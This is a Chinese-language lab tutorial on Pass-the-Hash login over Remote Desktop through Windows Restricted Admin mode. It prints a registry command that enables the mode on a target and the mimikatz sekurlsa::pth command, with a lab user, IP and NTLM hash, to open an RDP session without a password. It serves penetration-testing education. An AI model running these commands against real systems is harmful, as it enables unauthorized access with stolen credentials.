前言
通常在内网渗透中,我们大多数都能通过一些工具获取到某个用户的NTLM hash,利用暴力破解,得到密码。如果无法破解,可以尝试使用Pass the hash的方法去登陆。
环境说明
靶机: windows server 2012 R2
靶机ip: 192.168.127.139
用户名: lion
NTLM hash: 1d3b6d6676e48fa29ac504d67fd60978Restricted Admin mode
Windows 8.1和Windows Server 2012 R2默认支持该功能
Windows 7和Windows Server 2008 R2默认不支持,需要安装补丁2871997、2973351(亲测win7打上补丁后,一样不支持)
服务端和客户端都需要开启Restricted Admin mode,服务端没有开启,会出现连接受限(亲测无效)
win 2012开启Restricted Admin mode功能
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f查看是否开启,REG_DWORD 0x0 存在就是开启,0x01就是关闭
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" 
输入以下命令,检查客户端是否支持Restricted Admin mode
mstsc.exe /restrictedadmin win7 已经安装了补丁2871997、2973351
依然不支持Restricted Admin mode,执行后弹出远程桌面的参数说明,有可能是我哪步弄错了吧。我确保win7打完补丁后,重启了计算机,我还重启了4 5遍。。所以说亲测无效
win10 正常打开
攻击演示
下载mimikatz
privilege::debug
sekurlsa::pth /user:lion /domain:192.168.127.139 /ntlm:1d3b6d6676e48fa29ac504d67fd60978 "/run:mstsc.exe /restrictedadmin"管理员组
用户需在管理员组下,才能成功连接
Restricted Admin mode使用当前Windows登录凭据,不需要输入口令,直接点连接即可
如遇到出现身份验证错误,解决方法
当我关闭了Restricted Admin mode,任然能连接成功。。
远程桌面组
用户是远程桌面组
会出现下图情况
未加入本地组
参考资料
内网技巧-RDP劫持及利用hash登录
渗透技巧——Pass the Hash with Remote Desktop(Restricted Admin mode)